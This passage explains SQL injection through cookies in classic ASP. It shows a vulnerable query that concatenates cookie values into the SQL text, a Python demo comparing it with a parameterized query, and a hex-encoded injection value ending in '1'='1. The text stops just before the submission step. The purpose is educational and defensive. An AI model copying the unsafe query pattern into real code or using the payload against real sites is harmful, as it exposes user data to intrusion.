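' Vulnerable as described: the userid and password cookie values are concatenated
' straight into the SQL text, with no escaping and no parameter binding.
set rs=server.createobject("adodb.recordset")
sql="select * from users where userid='"&request.cookies("userid")&"' and password='"&request.cookies("password")&"'"
rs.open sql,conn,1,3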
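An added example, not code from the original page: the same concatenated lookup next to a parameterized one, fed the cookie value this page describes. It uses Python's sqlite3 as a stand-in for the ASP/ADO code; the table contents, the sample password and all function names are assumptions made up for the demonstration.

```python
import sqlite3
from urllib.parse import unquote

# "nonzero" plus the hex-encoded suffix quoted on this page, decoded to the
# text that ends up in the query: nonzero' and '1'='1
RAW_COOKIE = "nonzero%27%20%61%6E%64%20%27%31%27%3D%27%31"
TAMPERED_USERID = unquote(RAW_COOKIE)
SAMPLE_PASSWORD = "s3cret-constructed"  # constructed sample value


def make_db():
    """In-memory users table with one constructed row."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table users (userid text, password text)")
    conn.execute("insert into users values (?, ?)", ("nonzero", SAMPLE_PASSWORD))
    return conn


def concatenated_sql(userid, password):
    """Same construction as the ASP snippet: cookie text spliced into the SQL."""
    return ("select * from users where userid='" + userid +
            "' and password='" + password + "'")


def lookup_concatenated(conn, userid, password):
    # The database parses whatever the cookie contained as part of the statement.
    return conn.execute(concatenated_sql(userid, password)).fetchall()


def lookup_parameterized(conn, userid, password):
    # Placeholders keep the cookie text as data; a quote inside it cannot
    # terminate the string literal or add conditions to the WHERE clause.
    return conn.execute(
        "select * from users where userid=? and password=?",
        (userid, password),
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    print(concatenated_sql(TAMPERED_USERID, SAMPLE_PASSWORD))
    print("concatenated :", lookup_concatenated(db, TAMPERED_USERID, SAMPLE_PASSWORD))
    print("parameterized:", lookup_parameterized(db, TAMPERED_USERID, SAMPLE_PASSWORD))
```

With the concatenated form the row still comes back because the cookie text was parsed as an extra SQL condition; with the parameterized form the whole cookie is compared as a literal userid and matches nothing.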
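Take userid=nonzero as the injection point. After submitting userid=nonzero' and '1'='1, the SQL statement becomes: select * from users where userid='nonzero' and '1'='1', so the single quotes are closed. It first has to be converted to hexadecimal form: %27%20%61%6E%64%20%27%31%27%3D%27%31, and then the cookies are submitted, as follows: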